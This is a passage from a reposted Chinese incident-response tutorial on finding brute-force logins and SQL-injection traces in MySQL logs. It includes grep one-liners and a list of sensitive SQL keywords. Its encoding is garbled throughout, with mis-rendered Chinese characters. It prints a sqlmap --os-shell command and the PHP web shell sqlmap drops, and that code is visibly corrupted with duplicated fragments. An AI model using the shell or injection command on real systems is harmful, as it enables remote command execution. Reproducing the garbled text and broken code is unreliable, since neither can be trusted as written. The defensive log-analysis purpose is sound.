第5篇:MySQL日志分析

常見(jiàn)的數(shù)據(jù)庫(kù)攻擊包括弱口令、SQL注入、提升權(quán)限、竊取備份等。對(duì)數(shù)據(jù)庫(kù)日志進(jìn)行分析，可以發(fā)現(xiàn)攻擊行為，進(jìn)一步還原攻擊場(chǎng)景及追溯攻擊源。

0x01 Mysql日志分析

general query log能記錄成功連接和每次執(zhí)行的查詢，我們可以將它用作安全布防的一部分，為故障分析或黑客事件后的調(diào)查提供依據(jù)。

1、查看log配置信息
show variables like '%general%';
2、開(kāi)啟日志
SET GLOBAL general_log = 'On';
3、指定日志文件路徑
#SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';

比如，當(dāng)我訪問(wèn) /test.php?id=1，此時(shí)我們得到這樣的日志：

190604 14:46:14       14 Connect    root@localhost on 
           14 Init DB    test
           14 Query    SELECT * FROM admin WHERE id = 1
           14 Quit  `

我們按列來(lái)解析一下：

第一列:Time，時(shí)間列，前面一個(gè)是日期,后面一個(gè)是小時(shí)和分鐘，有一些不顯示的原因是因?yàn)檫@些sql語(yǔ)句幾乎是同時(shí)執(zhí)行的,所以就不另外記錄時(shí)間了。
第二列:Id，就是show processlist出來(lái)的第一列的線程ID,對(duì)于長(zhǎng)連接和一些比較耗時(shí)的sql語(yǔ)句,你可以精確找出究竟是那一條那一個(gè)線程在運(yùn)行。
第三列:Command，操作類型，比如Connect就是連接數(shù)據(jù)庫(kù)，Query就是查詢數(shù)據(jù)庫(kù)(增刪查改都顯示為查詢)，可以特定過(guò)慮一些操作。
第四列:Argument，詳細(xì)信息，例如 Connect    root@localhost on 意思就是連接數(shù)據(jù)庫(kù)，如此類推,接下面的連上數(shù)據(jù)庫(kù)之后,做了什么查詢的操作。

0x02 登錄成功/失敗

我們來(lái)做個(gè)簡(jiǎn)單的測(cè)試吧，使用我以前自己開(kāi)發(fā)的弱口令工具來(lái)掃一下，字典設(shè)置比較小，2個(gè)用戶，4個(gè)密碼，共8組。

MySQL中的log記錄是這樣子：

Time                 Id        Command         Argument

190601 22:03:20     98 Connect  root@192.168.204.1 on 
       98 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)
      103 Connect  mysql@192.168.204.1 on 
      103 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      104 Connect  mysql@192.168.204.1 on 
      104 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      100 Connect  root@192.168.204.1 on 
      101 Connect  root@192.168.204.1 on 
      101 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)
       99 Connect  root@192.168.204.1 on 
       99 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)
      105 Connect  mysql@192.168.204.1 on 
      105 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      100 Query  set autocommit=0
      102 Connect  mysql@192.168.204.1 on 
      102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      100 Quit  `

你知道在這個(gè)口令猜解過(guò)程中，哪個(gè)是成功的嗎？

利用爆破工具，一個(gè)口令猜解成功的記錄是這樣子的：

190601 22:03:20     100 Connect  root@192.168.204.1 on 
     100 Query  set autocommit=0
     100 Quit

但是，如果你是用其他方式，可能會(huì)有一點(diǎn)點(diǎn)不一樣的哦。

Navicat for MySQL登錄：

190601 22:14:07    106 Connect  root@192.168.204.1 on 
             106 Query  SET NAMES utf8
             106 Query  SHOW VARIABLES LIKE 'lower_case_%'
             106 Query  SHOW VARIABLES LIKE 'profiling'
             106 Query  SHOW DATABASES

命令行登錄：

190601 22:17:25    111 Connect  root@localhost on 
             111 Query  select @@version_comment limit 1
190601 22:17:56    111 Quit

這個(gè)差別在于，不同的數(shù)據(jù)庫(kù)連接工具，它在連接數(shù)據(jù)庫(kù)初始化的過(guò)程中是不同的。通過(guò)這樣的差別，我們可以簡(jiǎn)單判斷出用戶是通過(guò)連接數(shù)據(jù)庫(kù)的方式。

另外，不管你是爆破工具、Navicat for MySQL、還是命令行，登錄失敗都是一樣的記錄。

登錄失敗的記錄：

102 Connect  mysql@192.168.204.1 on 
102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

利用shell命令進(jìn)行簡(jiǎn)單的分析：

#有哪些IP在爆破？
grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
     27 192.168.204.1

#爆破用戶名字典都有哪些？
grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr
     13 mysql
     12 root
      1 root
      1 mysql

在日志分析中，特別需要注意一些敏感的操作行為，比如刪表、備庫(kù)，讀寫文件等。關(guān)鍵詞：drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。

敏感數(shù)據(jù)庫(kù)表：SELECT * from mysql.user、SELECT * from mysql.func

0x03 SQL注入入侵痕跡

在利用SQL注入漏洞的過(guò)程中，我們會(huì)嘗試?yán)胹qlmap的--os-shell參數(shù)取得shell，如操作不慎，可能留下一些sqlmap創(chuàng)建的臨時(shí)表和自定義函數(shù)。我們先來(lái)看一下sqlmap os-shell參數(shù)的用法以及原理：

1、構(gòu)造一個(gè)SQL注入點(diǎn)，開(kāi)啟Burp監(jiān)聽(tīng)8080端口

sqlmap.py -u http://192.168.204.164/sql.php?id=1 --os-shell --proxy=http://127.0.0.1:8080

HTTP通訊過(guò)程如下：

創(chuàng)建了一個(gè)臨時(shí)文件tmpbwyov.php，通過(guò)訪問(wèn)這個(gè)木馬執(zhí)行系統(tǒng)命令，并返回到頁(yè)面展示。

tmpbwyov.php：

<?php c=c=c=_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);z=@iniget(′disablefunctions′);if(!empty(z=@ini_get('disable_functions');if(!empty(z=@ini?g??et(?′??disable?f??unctions?′??);if(!empty(z)){z=pregreplace(′/[,]+/′,′,′,z=preg_replace('/[, ]+/',',',z=preg?r??eplace(?′??/[,]+/?′??,?′??,?′??,z);z=explode(′,′,z=explode(',',z=explode(?′??,?′??,z);z=arraymap(′trim′,z=array_map('trim',z=array?m??ap(?′??trim?′??,z);}else{z=array();}c=c." 2>&1\n";function f(n){global z;returniscallable(z;return is_callable(z;returnis?c??allable(n)and!in_array(n,n,n,z);}if(f('system')){ob_start();system(c);c);c);w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){y=procopen(y=proc_open(y=proc?o??pen(c,array(array(pipe,r),array(pipe,w),array(pipe,w)),t);t);t);w=NULL;while(!feof(t[1])){w.=fread(t[1],512);}@proc_close(y);}elseif(f('shell_exec')){w=shellexec(w=shell_exec(w=shell?e??xec(c);}elseif(f('passthru')){ob_start();passthru(c);c);c);w=ob_get_contents();ob_end_clean();}elseif(f('popen')){x=popen(x=popen(x=popen(c,r);w=NULL;if(isresource(w=NULL;if(is_resource(w=NULL;if(is?r??esource(x)){while(!feof(x)){w.=fread(x,512);}}@pclose(x);}elseif(f('exec')){w=array();exec(w=array();exec(w=array();exec(c,w);w);w);w=join(chr(10),w).chr(10);}else{w=0;}print "<pre>".$w."</pre>";?>`

創(chuàng)建了一個(gè)臨時(shí)表sqlmapoutput，調(diào)用存儲(chǔ)過(guò)程執(zhí)行系統(tǒng)命令將數(shù)據(jù)寫入臨時(shí)表，然后取臨時(shí)表中的數(shù)據(jù)展示到前端。

通過(guò)查看網(wǎng)站目錄中最近新建的可疑文件，可以判斷是否發(fā)生過(guò)sql注入漏洞攻擊事件。

檢查方法：

1、檢查網(wǎng)站目錄下，是否存在一些木馬文件：

2、檢查是否有UDF提權(quán)、MOF提權(quán)痕跡

檢查目錄是否有異常文件

mysql\lib\plugin

c:/windows/system32/wbem/mof/

檢查函數(shù)是否刪除

select * from mysql.func

3、結(jié)合web日志分析。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-831665.html

到了這里，關(guān)于應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇（5）的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！